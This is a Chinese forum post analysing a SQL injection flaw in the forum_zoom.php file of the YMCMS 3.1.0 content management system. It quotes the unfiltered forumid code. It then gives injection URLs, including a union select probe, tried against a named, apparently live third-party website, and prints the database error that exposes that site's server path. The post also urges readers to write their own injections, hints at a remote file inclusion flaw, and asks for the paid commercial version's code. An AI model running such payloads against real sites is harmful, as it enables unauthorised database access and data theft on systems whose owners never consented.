[原创]ymcms3.1.0漏洞分析文章作者:
Flyh4t@126.com
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
注意:文章首发脚本安全小组内部论坛(www.Cnsst.Org),后由原创作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。
夜猫cms是一个很著名的商业cms,现在公开发放的免费版本最高是3.1.0(有哪位兄弟能提供
最新的3.2.0商业版,偶感激不尽)。看漏洞:
forum_zoom.php
31~48行
if ($forumid != ""){
$isforum = " && forumid IN (".$forumid.") ";
}else{
$isforum = "";
}
//forumid明显没有过滤
……
$sql = "SELECT threadid, title, lastpost FROM ".$ym_thread_tab." WHERE isshow='1' ".$isforum." ORDER BY ".$isaction." LIMIT 0, ".$shownum;
发生了注射
利用方法:
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=1/*
正常
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=2/*
空白
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201/*
暴错
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftp/512j.com/l/o/n/longchenhua/forum_zoom.php on line 50
大家看到了吧,可以自己去构造注射语句来利用了,偶就不再测试了
另外,这个系统还有远程包含的问题,大家要是有兴趣自己看哦
再次呼唤3.2.0商业版代码,可以发我邮箱,hoho
注:小组论坛因某些原因关闭了,小组一些原创的东西就发邪八给大家共享,Fly没权限,我代发了。
